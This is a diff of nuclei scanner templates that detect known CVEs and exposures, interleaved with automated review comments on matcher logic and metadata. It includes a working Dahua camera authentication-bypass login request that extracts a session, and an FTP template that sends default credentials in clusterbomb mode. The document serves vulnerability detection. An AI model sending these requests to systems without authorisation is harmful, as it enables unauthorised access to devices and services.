tags: cve,cve2021,cisco,rce,oob
|
||||
tags: cve,cve2021,cisco,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2021-20031
|
||||
|
||||
info:
|
||||
name: Sonicwall SonicOS 7.0 - Host Header Injection
|
||||
author: gy741
|
||||
severity: low
|
||||
description: A Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Sonicwall NAS, SonicWall Analyzer version 8.5.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attack
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50414
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20031
|
||||
metadata:
|
||||
google-dork: inurl:"auth.html" intitle:"SonicWall"
|
||||
tags: cve,cve2021,sonicwall,redirect
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET / HTTP/1.1
|
||||
Host: {{randstr}}.tld
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'https://{{randstr}}.tld/auth.html'
|
||||
- 'Please be patient as you are being re-directed'
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
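Review bot: This template has no `classification` block (`cvss-metrics`, `cvss-score`, `cve-id`, `cwe-id`) even though it carries a CVE id and every other new CVE template in this commit includes one; add it for consistency, with values taken from the NVD entry already listed under `reference`, and reconcile `severity: low` with whatever score is recorded. The `description` is also a single run-on sentence that ends mid-phrase at `during various other attack`; finish the sentence or trim it to the SonicWall-specific part.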
@ -9,7 +9,7 @@ info:
|
|||
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
|
||||
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
|
||||
tags: cve,cve2021,minio,ssrf,oob
|
||||
tags: cve,cve2021,minio,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 7.70
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-22214
|
||||
- https://vin01.github.io/piptagole/gitlab/ssrf/security/2021/06/15/gitlab-ssrf.html
|
||||
- https://docs.gitlab.com/ee/api/lint.html
|
||||
tags: cve,cve2021,gitlab,ssrf,oob
|
||||
tags: cve,cve2021,gitlab,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.60
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: The theme and plugin have exposed proxy functionality to unauthenticated users, sending requests to this proxy functionality will have the web server fetch and display the content from any URI, this would allow for SSRF (Server Side Request Forgery) and RFI (Remote File Inclusion) vulnerabilities on the website.
|
||||
severity: critical
|
||||
reference: https://wpscan.com/vulnerability/17591ac5-88fa-4cae-a61a-4dcf5dc0b72a
|
||||
tags: cve,cve2021,wordpress,lfi,ssrf,oob
|
||||
tags: cve,cve2021,wordpress,lfi,ssrf,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: |
|
||||
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oob,microsoft
|
||||
tags: cve,cve2021,ssrf,rce,exchange,oast,microsoft
|
||||
reference:
|
||||
- https://proxylogon.com/#timeline
|
||||
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/Yu3H0/IoT_CVE/tree/main/Tenda/CVE_3
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: cve,cve2021,tenda,rce,oob
|
||||
tags: cve,cve2021,tenda,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-32305
|
||||
- https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html
|
||||
tags: cve,cve2021,websvn,rce,oob
|
||||
tags: cve,cve2021,websvn,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -12,7 +12,7 @@ info:
|
|||
- https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
|
||||
- https://www.linuxlz.com/aqld/2331.html
|
||||
- https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
|
||||
tags: cve,cve2021,nodejs,rce,oob
|
||||
tags: cve,cve2021,nodejs,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.80
|
||||
|
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-33044
|
||||
|
||||
info:
|
||||
name: Dahua IPC/VTH/VTO devices Authentication Bypass
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: The identity authentication bypass vulnerability found in some Dahua products during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
|
||||
reference:
|
||||
- https://github.com/dorkerdevil/CVE-2021-33044
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33044
|
||||
- https://seclists.org/fulldisclosure/2021/Oct/13
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-33044
|
||||
cwe-id: CWE-287
|
||||
tags: dahua,cve,cve2021,auth-bypass
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /RPC2_Login HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Connection: close
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
Origin: http://{{Hostname}}/
|
||||
Referer: http://{{Hostname}}/
|
||||
|
||||
{"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "true"
|
||||
- "id"
|
||||
- "params"
|
||||
- "session"
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
group: 1
|
||||
part: body
|
||||
regex:
|
||||
- ',"result":true,"session":"([a-z]+)"\}'
|
|
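Review bot: The body word matcher lists `"true"`, `"id"`, `"params"` and `"session"` with `condition: and`, but `id`, `params` and `session` are field names that a rejected login response can also echo, and a bare `true` matches any boolean in the body, so the match does not establish that authentication actually succeeded. Anchor on the success field the extractor already relies on, `- '"result":true'`, instead of `- "true"`, and drop the field-name words that carry no signal. The extractor's `[a-z]+` session pattern also looks narrower than a typical session token; confirm against the referenced responses that sessions are purely lowercase letters, otherwise extraction silently yields nothing.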
@ -10,7 +10,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-33357
|
||||
- https://github.com/RaspAP/raspap-webgui
|
||||
description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
|
||||
tags: cve,cve2021,rce,raspap,oob
|
||||
tags: cve,cve2021,rce,raspap,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
severity: high
|
||||
reference:
|
||||
- https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
|
||||
tags: cve,cve2021,geutebruck,rce,oob
|
||||
tags: cve,cve2021,geutebruck,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.20
|
||||
|
|
|
@ -13,7 +13,7 @@ info:
|
|||
cvss-score: 9.80
|
||||
cve-id: CVE-2021-3577
|
||||
cwe-id: CWE-78
|
||||
tags: cve,cve2021,rce,oob,motorola,iot
|
||||
tags: cve,cve2021,rce,oast,motorola,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -32,3 +32,7 @@ requests:
|
|||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "set_city_timezone"
|
|
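Review bot: The added `- type: word` matcher for `set_city_timezone` omits `part:`, whereas the neighbouring interactsh matcher spells out `part: interactsh_protocol` with an explanatory comment; add `part: body` and a one-line comment stating what the string's presence confirms so the two matchers read alike. The `matchers:` list and its `matchers-condition` start before this hunk, so whether this matcher is AND-ed or OR-ed with the interactsh check is not visible here.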
@ -7,7 +7,7 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/
|
||||
tags: cve,cve2021,sureline,rce,oob
|
||||
tags: cve,cve2021,sureline,rce,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://firzen.de/building-a-poc-for-cve-2021-40438
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-40438
|
||||
tags: cve,cve2021,ssrf,apache,mod-proxy,oob
|
||||
tags: cve,cve2021,ssrf,apache,mod-proxy,oast
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 9.00
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: prometheus-config-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus config API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The config endpoint returns the loaded Prometheus configuration file. This file also contains addresses of targets and alerting/discovery services alongside the credentials required to access them. Usually, Prometheus replaces the passwords in the credentials config configuration field with the placeholder <secret> (although this still leaks the username).
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'job_name:'
|
||||
- '{"status":"success","data":'
|
||||
- 'targets:'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
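Review bot: The word `- 'targets:'` under `condition: and` will miss configurations whose scrape jobs use only service discovery (kubernetes_sd_configs, consul_sd_configs and so on) and never declare `static_configs` targets, if I read the JSON-wrapped YAML that /api/v1/status/config returns correctly. `job_name:` together with the `{"status":"success","data":` envelope already pins the response, so `- 'targets:'` could be dropped or replaced with `- 'scrape_configs:'`, which is present whenever `job_name:` is. The description itself says the response carries usernames and any credential the placeholder substitution does not cover, so it is worth a second look at whether `severity: info` understates an endpoint that returns the full scrape configuration.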
|
|
@ -0,0 +1,37 @@
|
|||
id: prometheus-flags-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus flags API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The flags endpoint provides a full path to the configuration file. If the file is stored in the home directory, it may leak a username.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/status/flags"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '"data":'
|
||||
- '"config.file":'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: web_admin_enabled
|
||||
regex:
|
||||
- '\"web\.enable\-admin\-api\"\: \"true\"'
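Review bot: The extractor regex `'\"web\.enable\-admin\-api\"\: \"true\"'` requires a literal space after the colon, but in my reading /api/v1/status/flags is produced by Go's JSON encoder as compact `"web.enable-admin-api":"true"`, so the `web_admin_enabled` extractor would never fire as written. `- '"web\.enable-admin-api":\s*"true"'` matches either layout, and inside single quotes the `\"`, `\-` and `\:` escapes are unnecessary. A short comment on the extractor, `# admin API enabled: remote deletion of series and snapshots is reachable`, would also tell the reader why this flag is singled out.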
|
|
@ -0,0 +1,31 @@
|
|||
id: prometheus-targets-endpoint
|
||||
|
||||
info:
|
||||
name: Prometheus targets API endpoint
|
||||
author: geeknik
|
||||
severity: info
|
||||
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer’s knowledge.
|
||||
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
|
||||
tags: prometheus,exposure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/targets"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '{"status":"success","data":'
|
||||
- 'Labels'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
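Review bot: The word `- 'Labels'` is case-sensitive in nuclei and, as far as I can tell, only matches through the `discoveredLabels` key of an active target, so an exposed instance with no configured targets answers `{"status":"success","data":{"activeTargets":[],"droppedTargets":[]}}` and is not reported even though the endpoint is reachable. `- '"activeTargets"'` is present in every successful response and is a more deliberate anchor than a substring that happens to appear in a nested key. A comment on the matcher naming the key it relies on would save the next maintainer the same check.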
|
|
@ -3,7 +3,7 @@ info:
|
|||
name: Keycloak Json File
|
||||
author: oppsec
|
||||
severity: info
|
||||
tags: exposure
|
||||
tags: exposure,keycloak,config
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -15,6 +15,7 @@ requests:
|
|||
- "{{BaseURL}}/server/storage/"
|
||||
- "{{BaseURL}}/intikal/storage/"
|
||||
- "{{BaseURL}}/elocker_old/storage/"
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: high
|
||||
description: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application.
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php
|
||||
tags: targa,ssrf,oob,iot
|
||||
tags: targa,ssrf,oast,iot
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: Cloudflare Image Resizing defaults to restricting resizing to the same domain. This prevents third parties from resizing any image at any origin. However, you can enable this option if you check Resize images from any origin.
|
||||
reference: https://support.cloudflare.com/hc/en-us/articles/360028146432-Understanding-Cloudflare-Image-Resizing#12345684
|
||||
tags: cloudflare,misconfig,oob
|
||||
tags: cloudflare,misconfig,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Linkerd SSRF detection
|
||||
author: dudez
|
||||
severity: high
|
||||
tags: ssrf,linkerd,oob
|
||||
tags: ssrf,linkerd,oast
|
||||
reference: https://twitter.com/nirvana_msu/status/1084144955034165248
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: skycaiji-install
|
||||
|
||||
info:
|
||||
name: SkyCaiji Exposed Installation
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
tags: tech,skycaiji,exposure,misconfig
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?s=/install/index/index'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>蓝天采集器 SkyCaiji 安装</title>'
|
||||
- 'https://www.skycaiji.com'
|
||||
- '<a href="/index.php?s=/Install/Index/step1" class="btn btn-lg btn-success">'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
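Review bot: The `info` block has no `description` or `reference`, unlike the three Prometheus templates added in the same commit; something like `description: The SkyCaiji web installer is reachable, so the installation appears to be re-runnable by anyone who can reach the site.` plus a `reference:` to the project's install documentation would let the finding be triaged without reading the matcher. The third word `'<a href="/index.php?s=/Install/Index/step1" class="btn btn-lg btn-success">'` hard-codes a root-relative path and will not match an instance served under a sub-directory; `'s=/Install/Index/step1'` is the stable part. The `tech` tag also reads oddly next to `misconfig` and `severity: high`, since this is a misconfiguration finding rather than a technology fingerprint.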
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: KabirSuda
|
||||
severity: medium
|
||||
description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
|
||||
tags: misconfig,oob,oauth
|
||||
tags: misconfig,oast,oauth
|
||||
reference: https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
|
||||
requests:
|
||||
|
|
|
@ -16,6 +16,7 @@ requests:
|
|||
- '{{BaseURL}}/gallery/zp-core/setup/index.php'
|
||||
- '{{BaseURL}}/zp-core/setup/index.php'
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -10,10 +10,12 @@ network:
|
|||
|
||||
- inputs:
|
||||
- data: "USER {{username}}\r\nPASS {{password}}\r\n"
|
||||
|
||||
host:
|
||||
- "{{Hostname}}:21"
|
||||
- "{{Hostname}}"
|
||||
|
||||
attack: clusterbomb
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
|
@ -27,9 +29,7 @@ network:
|
|||
- pass1
|
||||
- stingray
|
||||
|
||||
attack: clusterbomb
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "230"
|
||||
- "230 Login successful"
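Review bot: The `host:` list in the first hunk now carries both `"{{Hostname}}:21"` and `"{{Hostname}}"`, and when the input already names port 21 the two entries can, as far as I can tell, resolve to the same listener; with `attack: clusterbomb` every username/password pair would then be sent twice, doubling log noise and the chance of tripping a lockout or fail2ban rule on the scanned service. If nuclei's network executor de-duplicates resolved addresses this is moot, but a comment such as `# "{{Hostname}}" covers inputs that already carry a port` would record why both forms are listed. The enclosing `network:` block starts before the hunk.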
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks
|
||||
- https://github.com/assetnote/blind-ssrf-chains#confluence
|
||||
tags: confluence,atlassian,ssrf,jira,oob
|
||||
tags: confluence,atlassian,ssrf,jira,oast
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
- https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
|
||||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -9,7 +9,7 @@ info:
|
|||
- https://www.freebuf.com/vuls/208339.html
|
||||
- https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
reference:
|
||||
- https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson
|
||||
- https://github.com/wyzxxz/fastjson_rce_tool
|
||||
tags: fastjson,rce,deserialization,oob
|
||||
tags: fastjson,rce,deserialization,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request headers.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed URL from the request parameters.
|
||||
reference: https://github.com/PortSwigger/collaborator-everywhere
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: info
|
||||
description: The remote server fetched a spoofed DNS Name from the request.
|
||||
reference: https://portswigger.net/research/cracking-the-lens-targeting-https-hidden-attack-surface
|
||||
tags: oob,ssrf,generic
|
||||
tags: oast,ssrf,generic
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: A vulnerability in COMTREND ADSL Router allows remote authenticated users to execute arbitrary commands via the telnet interface, the password for this interface is leaked to unauthenticated users via the 'password.cgi' endpoint.
|
||||
reference: https://www.exploit-db.com/exploits/16275
|
||||
tags: router,exposure,iot
|
||||
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: EWEBS casmain.xgi arbitrary file reading vulnerability
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: A vulnerability in EWEBS's 'casmain.xgi' endpoint allows remote attackers to disclose the content of locally stored files via the 'Language_S' parameter.
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%9E%81%E9%80%9AEWEBS/%E6%9E%81%E9%80%9AEWEBS%20casmain.xgi%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html
|
||||
tags: ewebs,lfi
|
||||
|
||||
|
|
|
@ -5,7 +5,7 @@ info:
|
|||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/46074
|
||||
tags: hashicorp,rce,oob,intrusive
|
||||
tags: hashicorp,rce,oast,intrusive
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: HomeAutomation v3.3.2 Open Redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: A vulnerability in the HomeAutomation product allows remote unauthenticated attackers to inject a redirect URL via the 'api.php' endpoint and the 'redirect' parameter.
|
||||
reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php
|
||||
tags: iot,redirect
|
||||
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: The unknown exploit targets the login CGI script, where a key parameter is not properly sanitized leading to a command injection.
|
||||
reference:
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: mirai,rce,oob
|
||||
tags: mirai,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: vulnerabilities in the web-based management interface of NETGEAR WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE
|
||||
tags: netgear,rce,oob,router
|
||||
tags: netgear,rce,oast,router
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -8,7 +8,7 @@ info:
|
|||
reference:
|
||||
- https://packetstormsecurity.com/files/162993/OptiLink-ONT1GEW-GPON-2.1.11_X101-Remote-Code-Execution.html
|
||||
- https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai
|
||||
tags: optiLink,rce,oob
|
||||
tags: optiLink,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
|
||||
reference: https://www.exploit-db.com/exploits/49344
|
||||
tags: sar2html,rce,oob
|
||||
tags: sar2html,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -7,7 +7,7 @@ info:
|
|||
description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/50098
|
||||
tags: visualtools,rce,oob
|
||||
tags: visualtools,rce,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
severity: critical
|
||||
reference:
|
||||
- https://www.adminxe.com/2183.html
|
||||
tags: zimbra,ssrf,oob
|
||||
tags: zimbra,ssrf,oast
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
|
|
@ -4,7 +4,7 @@ info:
|
|||
name: Wordpress XMLRPC Pingback detection
|
||||
author: pdteam
|
||||
severity: info
|
||||
tags: wordpress,ssrf,oob
|
||||
tags: wordpress,ssrf,oast
|
||||
reference:
|
||||
